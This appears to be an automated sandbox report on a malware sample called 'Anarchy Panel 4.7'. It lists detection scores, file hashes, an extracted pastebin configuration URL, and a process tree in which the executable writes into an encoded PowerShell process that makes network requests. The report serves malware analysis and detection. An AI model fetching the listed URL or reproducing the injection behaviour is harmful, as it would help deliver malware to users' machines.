Overview

Task                  Score  Platform
Static                10     -
Anarchy Pa...el.exe   10     windows7-x64
Anarchy Pa...el.exe   10     windows10-2004-x64
Anarchy Pa...xe.xml   10     windows7-x64
Anarchy Pa...xe.xml   1      windows10-2004-x64
Anarchy Pa...oG.dll   3      windows7-x64
Anarchy Pa...oG.dll   1      windows10-2004-x64
Anarchy Pa...uJ.dll   1      windows7-x64
Anarchy Pa...uJ.dll   1      windows10-2004-x64
Anarchy Pa...qM.dll   1      windows7-x64
Anarchy Pa...qM.dll   1      windows10-2004-x64
Anarchy Pa...LC.dll   1      windows7-x64
Anarchy Pa...LC.dll   1      windows10-2004-x64
Anarchy Pa...wp.dll   5      windows7-x64
Anarchy Pa...wp.dll   1      windows10-2004-x64
Anarchy Pa...uZ.dll   1      windows7-x64
Anarchy Pa...uZ.dll   1      windows10-2004-x64
Anarchy Pa...nG.dll   1      windows7-x64
Anarchy Pa...nG.dll   1      windows10-2004-x64
Anarchy Pa...TS.dll   1      windows7-x64
Anarchy Pa...TS.dll   1      windows10-2004-x64
Anarchy Pa...xj.dll   1      windows7-x64
Anarchy Pa...xj.dll   1      windows10-2004-x64
Anarchy Pa...pi.dll   1      windows7-x64
Anarchy Pa...pi.dll   1      windows10-2004-x64
Anarchy Pa...s4.dll   1      windows7-x64
Anarchy Pa...s4.dll   1      windows10-2004-x64
Anarchy Pa...Ya.dll   1      windows7-x64
Anarchy Pa...Ya.dll   1      windows10-2004-x64
Anarchy Pa...Jn.dll   1      windows7-x64
Anarchy Pa...Jn.dll   1      windows10-2004-x64
Anarchy Pa...GA.dll   1      windows7-x64
Anarchy Pa...GA.dll   1      windows10-2004-x64
Analysis

max time kernel: 1566s
max time network: 1569s
platform: windows7_x64
resource: win7-20230712-en
resource tags: arch:x64, arch:x86, image:win7-20230712-en, locale:en-us, os:windows7-x64, system
submitted: 19-07-2023 00:36
Behavioral tasks

Task          Sample                                         Resource
behavioral1   Anarchy Panel 4.7/Anarchy Panel.exe            win7-20230712-en
behavioral2   Anarchy Panel 4.7/Anarchy Panel.exe            win10v2004-20230703-en
behavioral3   Anarchy Panel 4.7/Anarchy Panel.exe.xml        win7-20230712-en
behavioral4   Anarchy Panel 4.7/Anarchy Panel.exe.xml        win10v2004-20230703-en
behavioral5   Anarchy Panel 4.7/Plugins/0guo3zbo66fqoG.dll   win7-20230712-en
behavioral6   Anarchy Panel 4.7/Plugins/0guo3zbo66fqoG.dll   win10v2004-20230703-en
behavioral7   Anarchy Panel 4.7/Plugins/59Zp7paEHDF7luJ.dll  win7-20230712-en
behavioral8   Anarchy Panel 4.7/Plugins/59Zp7paEHDF7luJ.dll  win10v2004-20230703-en
behavioral9   Anarchy Panel 4.7/Plugins/CjETR6GpGXqM.dll     win7-20230712-en
behavioral10  Anarchy Panel 4.7/Plugins/CjETR6GpGXqM.dll     win10v2004-20230703-en
behavioral11  Anarchy Panel 4.7/Plugins/EVa7gBMKoaHmLC.dll   win7-20230712-en
behavioral12  Anarchy Panel 4.7/Plugins/EVa7gBMKoaHmLC.dll   win10v2004-20230703-en
behavioral13  Anarchy Panel 4.7/Plugins/FBSyChwp.dll         win7-20230712-en
behavioral14  Anarchy Panel 4.7/Plugins/FBSyChwp.dll         win10v2004-20230703-en
behavioral15  Anarchy Panel 4.7/Plugins/G3nl0mDcABnDuZ.dll   win7-20230712-en
behavioral16  Anarchy Panel 4.7/Plugins/G3nl0mDcABnDuZ.dll   win10v2004-20230703-en
behavioral17  Anarchy Panel 4.7/Plugins/KNTmoSnG.dll         win7-20230712-en
behavioral18  Anarchy Panel 4.7/Plugins/KNTmoSnG.dll         win10v2004-20230703-en
behavioral19  Anarchy Panel 4.7/Plugins/PK0TcnqTGFagQTS.dll  win7-20230712-en
behavioral20  Anarchy Panel 4.7/Plugins/PK0TcnqTGFagQTS.dll  win10v2004-20230703-en
behavioral21  Anarchy Panel 4.7/Plugins/RssCnLKcGRxj.dll     win7-20230712-en
behavioral22  Anarchy Panel 4.7/Plugins/RssCnLKcGRxj.dll     win10v2004-20230703-en
behavioral23  Anarchy Panel 4.7/Plugins/WkUP83aP9CABpi.dll   win7-20230712-en
behavioral24  Anarchy Panel 4.7/Plugins/WkUP83aP9CABpi.dll   win10v2004-20230703-en
behavioral25  Anarchy Panel 4.7/Plugins/eMTYbTz0gueNs4.dll   win7-20230712-en
behavioral26  Anarchy Panel 4.7/Plugins/eMTYbTz0gueNs4.dll   win10v2004-20230703-en
behavioral27  Anarchy Panel 4.7/Plugins/fzAgyDYa.dll         win7-20230712-en
behavioral28  Anarchy Panel 4.7/Plugins/fzAgyDYa.dll         win10v2004-20230703-en
behavioral29  Anarchy Panel 4.7/Plugins/mGWHaG2Jn.dll        win7-20230712-en
behavioral30  Anarchy Panel 4.7/Plugins/mGWHaG2Jn.dll        win10v2004-20230703-en
behavioral31  Anarchy Panel 4.7/Plugins/mML6WKMqdxjDGA.dll   win7-20230712-en
behavioral32  Anarchy Panel 4.7/Plugins/mML6WKMqdxjDGA.dll   win10v2004-20230703-en
General

Target: Anarchy Panel 4.7/Anarchy Panel.exe
Size: 72KB
MD5: 462b459a2560b65a657cfecce53d682a
SHA1: f0ce24faf42d2d1453c4f18fda0223b83486e5ae
SHA256: 00502647989c700d1cbf37685fcdf3a81d9302fb792edabecb5a211c5cdff0db
SHA512: 5d88eb5c91dd772d0c6f54e5d799639e1fd59d4dcf112674d065b76bb3ab048442cccc13f2f031f611b9632a223c961c7ad43f09a06b33d2f92adec7da9ff88b
SSDEEP: 384:5LerIjR+/cuFQ5r4NVX+oH38/1qmrc42mMPR45YHU/0/8IpzXePdCjiCNxKerWiV:nsUuFf
Malware Config

Extracted: https://pastebin.com/raw/p2s7tDSd
Signatures

Blocklisted process makes network request (9 IoCs)
Processes:
  flow  pid   process
  3     1936  powershell.exe
  5     1936  powershell.exe
  6     1936  powershell.exe
  7     1936  powershell.exe
  8     1936  powershell.exe
  9     1936  powershell.exe
  10    1936  powershell.exe
  11    1936  powershell.exe
  12    1936  powershell.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoCs)
Processes:
  pid   process
  1936  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes:
  description              pid   process
  Token: SeDebugPrivilege  1936  powershell.exe

Suspicious use of WriteProcessMemory (4 IoCs)
Processes:
  description                        pid   process            target process
  PID 1580 wrote to memory of 1936   1580  Anarchy Panel.exe  powershell.exe
  PID 1580 wrote to memory of 1936   1580  Anarchy Panel.exe  powershell.exe
  PID 1580 wrote to memory of 1936   1580  Anarchy Panel.exe  powershell.exe
  PID 1580 wrote to memory of 1936   1580  Anarchy Panel.exe  powershell.exe
Processes

(level 1) C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"
  PID: 1580
  - Suspicious use of WriteProcessMemory

  (level 2) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
    PID: 1936
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

(level 1) C:\Windows\explorer.exe
  Command line: "C:\Windows\explorer.exe"
  PID: 2192